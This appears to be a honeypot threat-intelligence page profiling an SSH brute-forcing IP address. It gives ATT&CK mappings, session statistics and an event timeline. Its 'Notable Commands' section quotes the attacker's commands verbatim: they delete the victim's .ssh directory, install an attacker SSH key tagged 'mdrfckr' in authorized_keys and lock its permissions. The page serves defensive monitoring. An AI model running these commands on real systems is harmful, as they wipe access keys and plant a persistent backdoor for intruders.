IntrusionLabs IntrusionLabs
← Back to feed

94.16.120.89

Threat Confidence
49%
Location
🇩🇪 DE / Nuremberg
ASN
AS197540 · netcup GmbH
Cloud Provider
Total Events
287
Top 10% by volume
Agent Count
1
First / Last Seen
2026-04-09 10:14 — 2026-04-09 10:51
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Initial Access
T1078
Defense Evasion
T1070.004
Credential Access
T1110 T1110.001
Command and Control
T1105
External Corroboration
Not flagged by any external feeds
Campaigns
Not associated with any campaigns
Session Forensics
malware_dropper ×9 credential_harvester ×25 opportunistic_bruter ×9
Sessions
43 (18 with login)
Avg Depth Score
0.52
Commands Executed
27
Files Downloaded
9
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Fingerprints
HASSH
03a80b21afa810682a776a7d42e5e6fb
SSH Client
SSH-2.0-libssh_0.11.1
Evidence Timeline
Opportunistic Bruter 0f47ce5ffe04 w4m_seattle_01 · 2026-04-09 10:51
1 50%
Loading events...
Malware Dropper 7712d6ce1701 w4m_seattle_01 · 2026-04-09 10:51
3 1 1 100%
Loading events...
Credential Harvester 10dbd46e086c w4m_seattle_01 · 2026-04-09 10:51
1 35%
Loading events...
Opportunistic Bruter ad7837bd56f2 w4m_seattle_01 · 2026-04-09 10:50
1 50%
Loading events...
Malware Dropper 784dad2e770e w4m_seattle_01 · 2026-04-09 10:50
3 1 1 100%
Loading events...
Credential Harvester a759e142ae3f w4m_seattle_01 · 2026-04-09 10:50
1 35%
Loading events...
Credential Harvester c84a4712f1c1 w4m_seattle_01 · 2026-04-09 10:48
1 35%
Loading events...
Credential Harvester 62398e8b89cd w4m_seattle_01 · 2026-04-09 10:47
1 35%
Loading events...
Credential Harvester ca2d5efbbb78 w4m_seattle_01 · 2026-04-09 10:45
1 35%
Loading events...
Credential Harvester dd126b0aab12 w4m_seattle_01 · 2026-04-09 10:44
1 35%
Loading events...
Credential Harvester c3e51f813b63 w4m_seattle_01 · 2026-04-09 10:42
1 35%
Loading events...
Credential Harvester c80721526845 w4m_seattle_01 · 2026-04-09 10:41
1 35%
Loading events...
Credential Harvester 0e168f7071e1 w4m_seattle_01 · 2026-04-09 10:39
1 35%
Loading events...
Malware Dropper ddd387c4bf23 w4m_seattle_01 · 2026-04-09 10:38
3 1 1 100%
Loading events...
Opportunistic Bruter e7a36c4e6a13 w4m_seattle_01 · 2026-04-09 10:38
1 50%
Loading events...
Credential Harvester 609fe27de975 w4m_seattle_01 · 2026-04-09 10:38
1 35%
Loading events...
Credential Harvester 8b4dd68518aa w4m_seattle_01 · 2026-04-09 10:36
1 35%
Loading events...
Credential Harvester 8b84e013d212 w4m_seattle_01 · 2026-04-09 10:35
1 35%
Loading events...
Opportunistic Bruter 7f5756e48dc8 w4m_seattle_01 · 2026-04-09 10:33
1 50%
Loading events...
Malware Dropper 91059f953628 w4m_seattle_01 · 2026-04-09 10:33
3 1 1 100%
Loading events...
Credential Harvester dbdbd9bb2a40 w4m_seattle_01 · 2026-04-09 10:33
1 35%
Loading events...
Opportunistic Bruter ab7de70f3a01 w4m_seattle_01 · 2026-04-09 10:32
1 50%
Loading events...
Malware Dropper c88704a3a327 w4m_seattle_01 · 2026-04-09 10:32
3 1 1 100%
Loading events...
Credential Harvester 33714639ddb0 w4m_seattle_01 · 2026-04-09 10:32
1 35%
Loading events...
Credential Harvester 6a19e0eaff78 w4m_seattle_01 · 2026-04-09 10:30
1 35%
Loading events...
Malware Dropper c66797822b6f w4m_seattle_01 · 2026-04-09 10:29
3 1 1 100%
Loading events...
Opportunistic Bruter 34869429584e w4m_seattle_01 · 2026-04-09 10:29
1 50%
Loading events...
Credential Harvester 7b27c853c2e1 w4m_seattle_01 · 2026-04-09 10:29
1 35%
Loading events...
Credential Harvester 66336e309e14 w4m_seattle_01 · 2026-04-09 10:27
1 35%
Loading events...
Credential Harvester 2bbee550174c w4m_seattle_01 · 2026-04-09 10:25
1 35%
Loading events...
Opportunistic Bruter 66b207ad6247 w4m_seattle_01 · 2026-04-09 10:24
1 50%
Loading events...
Malware Dropper 7eef08df680b w4m_seattle_01 · 2026-04-09 10:24
3 1 1 100%
Loading events...
Credential Harvester 597cf47cbeb4 w4m_seattle_01 · 2026-04-09 10:24
1 35%
Loading events...
Opportunistic Bruter e1a92e981db6 w4m_seattle_01 · 2026-04-09 10:22
1 50%
Loading events...
Malware Dropper 851820847f19 w4m_seattle_01 · 2026-04-09 10:22
3 1 1 100%
Loading events...
Credential Harvester 822762cd63ac w4m_seattle_01 · 2026-04-09 10:22
1 35%
Loading events...
Credential Harvester f71d1a86b697 w4m_seattle_01 · 2026-04-09 10:21
1 35%
Loading events...
Opportunistic Bruter 82363fb0fc01 w4m_seattle_01 · 2026-04-09 10:19
1 50%
Loading events...
Malware Dropper 37ce0e836b27 w4m_seattle_01 · 2026-04-09 10:19
3 1 1 100%
Loading events...
Credential Harvester cb7fff0bea3c w4m_seattle_01 · 2026-04-09 10:19
1 35%
Loading events...
Credential Harvester 33c44d4e60d9 w4m_seattle_01 · 2026-04-09 10:18
1 35%
Loading events...
Credential Harvester cf4c444d8671 w4m_seattle_01 · 2026-04-09 10:16
1 35%
Loading events...
Credential Harvester 37b8e6578e49 w4m_seattle_01 · 2026-04-09 10:14
1 35%
Loading events...